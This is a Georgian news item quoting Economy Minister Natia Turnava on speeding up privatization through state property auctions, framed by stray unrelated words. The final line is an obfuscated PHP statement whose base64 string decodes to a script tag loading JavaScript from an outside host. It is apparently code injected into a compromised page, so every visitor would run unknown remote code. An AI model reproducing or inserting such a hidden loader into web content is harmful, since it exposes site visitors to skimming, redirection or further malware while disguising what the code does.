celsiusi
ავერსი შნაიდერი
როდესაც ჩვენი ბიუჯეტი პანდემიის გამო გადატვირთულია სოციალური ვალდებულებებით, სწორედ კერძო სექტორმა უნდა იტვირთოს ეკონომიკის აღორძინების და განვითარების ლოკომოტივის როლი. ამიტომ ჩვენ მაქსიმალურად ვაჩქარებთ პრივატიზაციას, - ამის შესახებ ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ნათია თურნავამ მთავრობის სხდომის დასრულების შემდეგ განაცხადა.
 
ნათია თურნავას ინფორმაციით, ამ კვირაში მომდევნო აუქციონი გამოცხადდება, რომელზეც 150-ზე მეტი ლოტი იქნება წარმოდგენილი. მისივე თქმით, „ყველაფერი იპოვის თავის პატრონს“ და გადაეცემა კერძო სექტორს, იმისათვის, რომ ეკონომიკა კიდევ უფრო სწრაფად განვითარდეს.
 
„დაჩქარებული პრივატიზაცია არის ჩვენი საბიუჯეტო შემოსავლების რესურსი და სწორედ, ეს საბიუჯეტო შემოსავლები, მათ შორის ხმარდება ახალ მასშტაბურ პროგრამებს. გარდა ამისა, როდესაც ჩვენი ბიუჯეტი პანდემიის გამო გადატვირთულია სოციალური ვალდებულებებით, სწორედ კერძო სექტორმა უნდა იტვირთოს ეკონომიკის აღორძინების და განვითარების ლოკომოტივის როლი. ამიტომ ჩვენ მაქსიმალურად ვაჩქარებთ პრივატიზაციას, წამოვიწყეთ პრემიერ-მინისტრის ინიციატივით ახალი, მასშტაბური პროექტი და პირველივე აუქციონი ძალიან კარგი შედეგებით დასრულდა. 41 მილიონი ლარის ჯამური პაკეტი გაიყიდა 60 მილიონ ლარად, ეს იყო 250-ზე მეტი ობიექტი. ამ კვირაში ჩვენ შემდეგ აუქციონს ვაცხადებთ, სადაც ასევე იქნება 150-ზე მეტი ლოტი, რომელშიც იქნება როგორც ძველი, ასევე ახალი ობიექტები დამატებული. ველოდებით, რომ სახელმწიფო ბიუჯეტში შემოვა მნიშვნელოვანი თანხა და რაც უფრო მნიშვნელოვანია, არ გვექნება არცერთი დაუმუშავებელი მიწა, არ გვექნება არცერთი ძველი საბჭოთა ნანგრევი შენობა და გაჩერებული სახელმწიფო საწარმოები. ყველაფერი იპოვის თავის პატრონს და გადაეცემა კერძო სექტორს, იმისათვის, რომ ჩვენი ეკონომიკა კიდევ უფრო სწრაფად განვითარდეს“, - აღნიშნა ნათია თურნავამ.
1345
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");